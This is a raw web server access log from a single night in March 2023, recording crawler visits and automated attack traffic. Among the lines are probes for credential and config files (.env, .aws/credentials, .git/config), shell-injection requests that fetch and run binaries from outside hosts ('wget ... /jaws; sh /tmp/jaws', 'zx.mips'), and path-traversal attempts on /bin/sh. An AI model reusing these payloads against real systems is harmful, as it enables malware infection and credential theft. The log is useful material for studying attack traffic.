194.163.188.175 - - [06/Mar/2023:02:17:58 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
139.99.123.180 - - [06/Mar/2023:02:19:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:54 +0100] "GET /.env.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:54 +0100] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:55 +0100] "GET /.env.old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:55 +0100] "GET /env.js HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:55 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:56 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:56 +0100] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:56 +0100] "GET /tmp/phpinfo.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:57 +0100] "GET /phpinfo/phpinfo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:57 +0100] "GET /php-info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:58 +0100] "GET /pinfo.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:58 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:58 +0100] "GET /configs/s3_config.json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:59 +0100] "GET /s3cmd.ini HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:59 +0100] "GET /wp-config.php.bak HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:19:59 +0100] "GET /settings.php.bak HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:00 +0100] "GET /configs/application.ini HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:00 +0100] "GET /src/phpinfo.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:00 +0100] "GET /temp.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:01 +0100] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:01 +0100] "GET /php.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:01 +0100] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:02 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:02 +0100] "GET /config/aws.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:02 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:03 +0100] "GET /_profiler/phpinfo.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:03 +0100] "GET /.env.dev.local HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:04 +0100] "GET /infos.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:04 +0100] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:04 +0100] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:05 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:05 +0100] "GET /configuration.php-dist HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:05 +0100] "GET /.aws/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:06 +0100] "GET /.config HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:06 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:06 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:07 +0100] "GET /web/debug/default/view?panel=config HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:07 +0100] "GET /frontend/web/debug/default/view?panel=config HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:07 +0100] "GET /_ignition/health-check HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
139.99.123.180 - - [06/Mar/2023:02:20:08 +0100] "GET /.circleci/config.yml HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
109.237.98.226 - - [06/Mar/2023:02:27:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
111.118.40.97 - - [06/Mar/2023:02:32:54 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.142.236.40 - - [06/Mar/2023:02:33:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.40 - - [06/Mar/2023:02:33:07 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.40 - - [06/Mar/2023:02:33:08 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.40 - - [06/Mar/2023:02:33:09 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.40 - - [06/Mar/2023:02:33:11 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
45.61.188.225 - - [06/Mar/2023:02:37:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
138.68.105.76 - - [06/Mar/2023:02:39:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
54.176.104.77 - - [06/Mar/2023:02:41:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
194.163.188.175 - - [06/Mar/2023:03:00:50 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.32.162.159 - - [06/Mar/2023:03:05:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [06/Mar/2023:03:09:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
60.221.224.113 - - [06/Mar/2023:03:09:57 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
60.161.138.28 - - [06/Mar/2023:03:09:58 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
60.221.224.111 - - [06/Mar/2023:03:09:59 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
60.172.6.70 - - [06/Mar/2023:03:10:01 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
14.115.104.94 - - [06/Mar/2023:03:10:01 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
59.49.19.46 - - [06/Mar/2023:03:10:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
218.21.168.98 - - [06/Mar/2023:03:10:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
61.158.173.189 - - [06/Mar/2023:03:10:03 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
194.163.188.175 - - [06/Mar/2023:03:16:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
198.98.58.2 - - [06/Mar/2023:03:20:54 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
35.93.109.158 - - [06/Mar/2023:03:21:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
193.32.162.159 - - [06/Mar/2023:03:24:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.46.161.81 - - [06/Mar/2023:03:24:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
119.114.112.84 - - [06/Mar/2023:03:28:30 +0100] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
193.32.162.159 - - [06/Mar/2023:03:34:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:02 +0100] "GET /sitemap-index.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
138.201.200.97 - - [06/Mar/2023:03:42:03 +0100] "GET /sitemaps/sitemap.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
78.46.204.32 - - [06/Mar/2023:03:42:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Wappalyzer)"
89.148.11.222 - - [06/Mar/2023:03:42:54 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
143.244.50.172 - - [06/Mar/2023:03:44:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
167.94.138.44 - - [06/Mar/2023:03:49:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.44 - - [06/Mar/2023:03:49:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.44 - - [06/Mar/2023:03:49:03 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.44 - - [06/Mar/2023:03:49:04 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
54.241.63.28 - - [06/Mar/2023:03:50:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
143.244.50.172 - - [06/Mar/2023:03:51:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.32.162.159 - - [06/Mar/2023:03:52:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.248.143.84 - - [06/Mar/2023:03:52:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
143.244.50.172 - - [06/Mar/2023:03:52:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:03:56:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
35.80.29.168 - - [06/Mar/2023:03:58:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
143.244.50.172 - - [06/Mar/2023:04:01:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:04:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
35.81.163.135 - - [06/Mar/2023:04:02:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
193.32.162.159 - - [06/Mar/2023:04:02:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
170.64.158.125 - - [06/Mar/2023:04:03:36 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
206.189.53.193 - - [06/Mar/2023:04:04:19 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
143.198.28.214 - - [06/Mar/2023:04:04:35 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
143.244.50.172 - - [06/Mar/2023:04:05:14 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
85.204.209.143 - - [06/Mar/2023:04:05:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
167.71.172.126 - - [06/Mar/2023:04:05:48 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
68.183.201.170 - - [06/Mar/2023:04:06:23 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
167.99.182.137 - - [06/Mar/2023:04:06:54 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
159.223.219.66 - - [06/Mar/2023:04:07:59 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
143.110.224.146 - - [06/Mar/2023:04:08:21 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
193.32.162.159 - - [06/Mar/2023:04:09:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [06/Mar/2023:04:10:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.183.197.20 - - [06/Mar/2023:04:10:39 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 zgrab/0.x"
51.254.59.113 - - [06/Mar/2023:04:11:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
193.32.162.159 - - [06/Mar/2023:04:12:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.255.242.207 - - [06/Mar/2023:04:13:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.118.53.194 - - [06/Mar/2023:04:13:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
183.136.225.32 - - [06/Mar/2023:04:17:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [06/Mar/2023:04:17:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [06/Mar/2023:04:17:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
193.32.162.159 - - [06/Mar/2023:04:19:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.244.50.172 - - [06/Mar/2023:04:19:52 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
128.14.209.162 - - [06/Mar/2023:04:23:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
35.81.163.135 - - [06/Mar/2023:04:27:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
143.244.50.172 - - [06/Mar/2023:04:28:20 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
